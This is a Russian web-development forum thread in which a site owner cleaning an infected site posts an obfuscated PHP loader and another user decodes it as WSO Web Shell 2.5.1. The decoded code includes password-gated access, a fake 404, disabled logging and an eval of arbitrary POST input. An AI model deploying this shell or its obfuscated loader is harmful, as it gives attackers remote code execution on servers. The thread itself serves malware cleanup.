Форум Сайтостроение Веб-строительство

Помогите расшифровать вредоносный код

Виталий
На сайте с 06.08.2012
Offline
92
Виталий
739

Добрый день.

Чищу сайт от вируса. Подозреваю, что нашел главный файл.

Помогите расшифровать. Здесь не только base64 

<?php

$vKR26EV = Array('1'=>'R', '0'=>'Y', '3'=>'Z', '2'=>'A', '5'=>'E', '4'=>'T', '7'=>'D', '6'=>'B', '9'=>'o', '8'=>'j', 'A'=>'2', 'C'=>'O', 'B'=>'U', 'E'=>'n', 'D'=>'J', 'G'=>'r', 'F'=>'d', 'I'=>'P', 'H'=>'x', 'K'=>'N', 'J'=>'a', 'M'=>'y', 'L'=>'i', 'O'=>'1', 'N'=>'s', 'Q'=>'X', 'P'=>'F', 'S'=>'p', 'R'=>'z', 'U'=>'H', 'T'=>'6', 'W'=>'q', 'V'=>'k', 'Y'=>'w', 'X'=>'Q', 'Z'=>'M', 'a'=>'u', 'c'=>'5', 'b'=>'K', 'e'=>'b', 'd'=>'h', 'g'=>'L', 'f'=>'3', 'i'=>'8', 'h'=>'l', 'k'=>'4', 'j'=>'g', 'm'=>'f', 'l'=>'m', 'o'=>'V', 'n'=>'v', 'q'=>'9', 'p'=>'c', 's'=>'C', 'r'=>'S', 'u'=>'7', 't'=>'t', 'w'=>'G', 'v'=>'I', 'y'=>'W', 'x'=>'e', 'z'=>'0');

function vBSAC62($vR34A2O, $vC9MYMI){$vXVSXMO = ''; for($i=0; $i < strlen($vR34A2O); $i++){$vXVSXMO .= isset($vC9MYMI[$vR34A2O[$i]]) ? $vC9MYMI[$vR34A2O[$i]] : $vR34A2O[$i];}

return base64_decode($vXVSXMO);}

$vN1J39Q = 'DwPOFwdmpwPRpM2qvsvcC7ZHZAK8Z8XAZ4Vf34jR0yZcZ4KdZ8VH385Y0RdL3rvusj9V0AqNe'.

'fvjIr2LvA1lKrvusL1V3y3dFyHzQAP8FwhneL2qvsFwJyHhpzOdeLpusL1V3y3dFyHzQfoR'.

'3oqdJlPkv7zjFUDO34NbDw1h3lPOeU1m0AddpEKhFs2qvsFQJycVefFR'.

'g45MK45ECY9bXwhaJoqR3QX9DAoMplqMQAHn3MpN4hoZ4sVusV6SelhmpAozbsFNeAFm3QDMefDRDMYYb4'.

'NbXwhaJoqR3QX9DAOdxPqhxwo8FQ1SeAcmFwht3rpNZsVusV6R3Q1mFwht3oqNJyOSFsjYb4'.

'NbXUKhFPqt0yFS0OqHFyqz3QKmpEoaFwht3rjYb4NbXw1h3lha3rjEoOKIQO3PBhKD4zkEgs2EZLkOg85Eb4NbslhlbwFhFPqt'.

'0yFS0OqHFyqz3QKm3f68bsVSvUNbvs2jvw3OelKzJyqavPF44fKzplhYpAH'.

'dpAdhpMjV0QDM0QVSvUNbvs2jvs2jvs6M3Q1OplkjJQKm0QDM0QV9DwPMplPcbr2/vwPMplPcQAOdpsjEoOKIpf1MJQ'.

'6RewPRJwoRDMYjDwPMplPcbr2TvUKzplhYpAHdpAdhpMjV0QDM0QVSCY9jvs2jmX9jvs2jDPqX4'.

'OKBv7zjoOKIpf1MJQ6RewPRJwoRbs1mB5q4osVusL2jvs2VQzKI4ztD1r2qvPF44fKzplhYpAHdpAdh'.

'pMjVQzKI4ztD1rVusEzbsl3OelKzJyqavUFRezHn3AhabsVjxY9jvs2jJwod3'.

'woMbsFvoP1XgR5aZs2zZ7Xj4lqzv53nFycVDMVusL2jvs6VJyB9v8XYKsvSCYSqsjSlFyc8FwhneL6QBzqR3Q18eAqGJyB9Dw'.

'NNvs1Abr6usL2jvs2VQzKI4ztD1oNVJOzjIr2VF8Nbvs2jvUKhFwKn'.

'eAtS3rjVJMYjDU0SCYSqsjSS3Ljd3yOYFUV9DwPOFwdmpwPRpMVSvUNbvs2jvwhlbwhRpAozbs1mB5q4oPNEpwPRpMFFbr2lDL'.

'29eyXObs1mB5q4oPNEpwPRpMFFbr2qIr2V0QozJPqY0QKRbrVbvs2jvs2jvs6QBzqR3Q18eAqGJyB9eyXOb'.

's1mBzoroVoryMFvoP1XQzdIBOXEQrVNvs1dFQ19Qf6dpfZSCY9bvs2jvwhlvsjdJQKR3QX9DPq74zqgrBoeeyXObs1mBz'.

'oroVoryMFvoP1XQzdIBOXEQrhFbr6ims29DPq74zqgrBoeeyXO'.

'bs1mBzoroVoryMFvoP1XQzdIBOXEQrhFvs5qvs1dFQ19Qf6dpfZSbX9j'.

'vs2jvs2jvUFRezHn3AhabsVusEzbsl3OelKzJyqavwP8FwhnehD7bsVjxY9jvs2jJy09vB2VQO6IBO1eDf2HDOzSvUNbvs2j'.

'vs2jvs2V0r2qvwPMplPcb29jvs2jvs2jvs2jvs2LFycdeyBLv7z+vU69pPqOelPt'.

'3rjSg29jvs2jvs2jvs2jvs2LpwdYQf3hpEKSeAkLv7z+vU69pU3hpEKSeAk9brYbvs2jvs2jvs2jvs2jvEFReOqA3'.

'QDRJyqavL2qIL6QBzqmoVorBzhI4LYbvs2jvs2jvs2jvs2jvEKd3loteA1hvL2qIL62JycSQAFhFsjEpA'.

'Pl3oqteA1hDMVbvs2jvs2jvs2SCY9jvs2jvs2jvwo8JwijpAoMJyPNJQShbs1db4Nbvs2jvUzj3yHR3r6usL2jvs2'.

'jvs2j3Q3desjVQO6IBO1eDf2HDOzSCY9jvs2jmXSqslhlbs6heQ6zxrjVQO6IBO1eDA5EQrVjbX9jvs2jJy09JQKR'.

'3QX9Dw1h3lPOeU1m0yKzJyqabr2lDL6lFyc8FwhnehqhxwhRFUZ9DAP8FwhneLpjgL2V3wol0QoNFPq'.

'd0f1SeAkSbX9jvs2jvs2jvs1mB5q4oPNE0rFFv7zjDw1h3lPOeU1m0yKzJyqaCY9jvs2j3yHR3X9jvs2jvs2jvs1mB5q4oPNE'.

'0rFFv7zjDOKh0zha3liECYSS3LjjvyotpU1cbs1mB5q4oPNE0rFFbr2lDL6lFyc8FwhnehqhxwhRFUZ9DAP8FwhneLpj'.

'gL2VQO6IBO1eDA5EQrVjbX9jvs2j0APNePqOpAoMQA3OelZ9DAP8'.

'FwhneLpjgL2VQO6IBO1eDA5EQrVuslokJQXu';

eval(vBSAC62($vN1J39Q, $vKR26EV));?>
VizInit
На сайте с 11.11.2014
Offline
3
VizInit
#1

WSO Web Shell 



$auth_pass = "98313cc246197e83ac913a291f10c8be";

$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    header('HTTP/1.0 404 Not Found');
    die("404");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

function actionRC() {
    if(!@$_POST['p1']) {
        $a = array(
            "uname" => php_uname(),
            "php_version" => phpversion(),
            "wso_version" => WSO_VERSION,
            "safemode" => @ini_get('safe_mode')
        );
        echo serialize($a);
    } else {
        eval($_POST['p1']);
    }
}
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' . $default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
exit;
Помогаю в решении технических задач.
Виталий
На сайте с 06.08.2012
Offline
92
Виталий
#2

Спасибо VizInit

Топик можно закрывать

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий